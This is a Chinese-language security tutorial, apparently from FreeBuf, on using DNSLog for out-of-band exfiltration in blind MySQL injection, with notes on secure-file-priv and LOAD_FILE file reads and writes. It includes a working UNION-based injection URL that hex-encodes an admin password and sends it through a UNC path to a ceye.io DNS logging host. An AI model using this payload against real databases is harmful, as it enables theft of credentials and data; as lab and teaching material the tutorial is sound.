DNSLog在MySQL注入中的实战 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

漏洞

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

DNSLog在MySQL注入中的实战

白垩之子 2021-02-25 00:59:29 506740

关于DNSlog在Web攻击的利用

简单理解就是在某些无法直接利用漏洞获得回显的情况下，但是目标可以发起DNS请求，这个时候可以通过DNSlog这种方式把想获得的数据外带出来。

常用在哪些情况下

SQL注入中的盲注
无回显的命令执行
无回显的SSRF

DNSlog攻击的基本原理

dnllog原理图

作为攻击者，提交注入语句，让数据库把需要查询的值和域名拼接起来，然后发生DNS查询，我们只要能获得DNS日志，就得到了想要的值。所以我们需要有一个自己的域名，然后再域名商处配置一条NS记录，然后我们在NS服务器上获取DNS日志即可。

DNSLOG在MySQL数据库中SQL注入的实战

本次演示一个最常见的注入场景，就是WHERE后面条件处的注入。实验环境有一个test_user表，三个字段id、user、pass。如下

id	user	pass
1	admin	admin123

最后就不再自己搭建一个DNS服务器了，直接用ceye.io这个平台，这个平台就集成了Dnslog的功能。

需要条件

MySQL开启load_file()
DNSLog平台（hyuga、CEYE）
Windows平台

Mysql服务端文件读写

条件：服务端配置可读写目录和正确的用户权限。

安全保护

mysql服务端的文件读取有很多的条件限制，主要是mysql数据库的配置，为了安全原因，当读取位于服务器上的文本文件时，文件必须处于数据库目录可被所有人读取。你可以通过执行show variables like '%secure%'来查看。

secure-file-priv参数是用来限制LOAD DATA,SELECT ... OUTFILE,DUMPFILE和LOAD_FILE()可以操作的文件夹。

secure-file-priv的值可以分为三种情况：

secure-file-priv的值为null，表示显示mysqld不允许导入|导出
secure-file-priv的值为/tmp/，表示限制mysqld的导入|导出只能发生在/tmp/目录下，此时如果读写发生在其他文件夹中，就会报错
当secure-file-priv的值没有具体值，表示不对mysqld的导入|导出做限制。

除此之外，读取或写入文件必须拥有可操作的用户权限否则会报错。

ERROR 1045 (28000): Access denied for user

读取文件

SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;

create database test;
create table test (id TEXT, content TEXT);
load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n\r';

写入文件

select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaaa";

load_file

MySQL应该是在实战中利用DNSLOG最多的。

在MySQL中，有一个load_file函数可以用来读取本地的文件。

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(concat('\\\\',(SELECT hex(pass) FROM test.test_user WHERE user='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\\abc'))

可以看到test_user中的pass字段的值的Hex码就被查询出来了，为什么这个地方Hex编码的目的就是减少干扰，因为很多时候数据库字段的值可能是有特殊符号的，这些特殊符号拼接在域名里是无法做DNS查询的，因为域名有一定的规范，有些特殊符号是不能带入的。

注意：load_file函数再Linux下是无法用来做DNSLOG攻击的，因为这里就涉及到Windows的UNC路径。